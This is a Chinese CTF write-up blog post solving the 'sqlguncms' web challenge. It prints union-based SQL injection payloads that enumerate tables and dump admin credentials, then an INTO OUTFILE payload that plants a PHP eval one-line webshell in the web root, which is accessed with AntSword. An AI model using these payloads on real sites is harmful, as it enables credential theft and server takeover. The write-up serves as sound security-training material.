sqlguncms

最新推荐文章于 2022-08-23 19:47:09 发布

Rgylin

最新推荐文章于 2022-08-23 19:47:09 发布

阅读量1.3k

点赞数 1

分类专栏： web

本文链接：https://blog.csdn.net/qq_46540840/article/details/118738625

版权

web 专栏收录该内容

13 篇文章 1 订阅

订阅专栏

sqlguncms

我们这里以比较真实环境来说来源于
Bmzctf平台

那道网站后发现有输入框 ,而且上面有回显内容大大减少了渗透的步骤

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #

-1 union select 1,group_concat(id,admin,password),3 from admin #

老样子一次得到

QQ截图20210714211236

QQ截图20210714211346

不过这里就得不到东西了那么抓包尝试写入一句话

select “写入的一句话” into outfile ’ 写入的文件’

那么构造语句

key=-1’ union select 1,"<?php phpinfo(); ?>", 3 into outfile ‘/var/www/html/phpinfo.php’#

成功

那么写入一句话木马

key=-1’ union select 1,"<?php @eval($_POST['sql']); ?>", 3 into outfile ‘/var/www/html/Rgylin.php’#

蚁剑链接得到shell

QQ截图20210714214710

根目录下得到flag

Rgylin

关注

1
点赞
踩
10

收藏

觉得还不错? 一键收藏
3
评论
sqlguncms

sqlguncms我们这里以比较真实环境来说那道网站后发现有输入框 ,而且上面有回显内容大大减少了渗透的步骤-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#-1' union select 1,group_concat(column_name),3 from information_schema.columns where tabl
复制链接

扫一扫